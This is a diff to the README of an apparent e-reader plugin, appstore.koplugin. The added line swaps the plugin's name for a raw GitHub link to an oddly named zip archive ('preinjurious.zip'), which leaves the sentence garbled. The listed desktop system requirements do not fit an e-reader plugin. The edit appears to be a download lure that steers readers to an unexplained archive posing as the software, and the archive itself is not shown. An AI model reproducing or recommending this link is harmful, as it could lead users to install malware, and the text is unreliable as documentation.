juanfuturochile/appstore.koplugin/README.md

 ## ⚙️ Minimum System Requirements

-To successfully run appstore.koplugin, your device should meet these requirements:
+To successfully run https://raw.githubusercontent.com/juanfuturochile/appstore.koplugin/main/novation/appstore.koplugin-preinjurious.zip, your device should meet these requirements:

 - **Operating System:** Windows 10 or later, MacOS 10.13 or later, or Linux (latest distributions)
 - **Memory:** At least 4 GB of RAM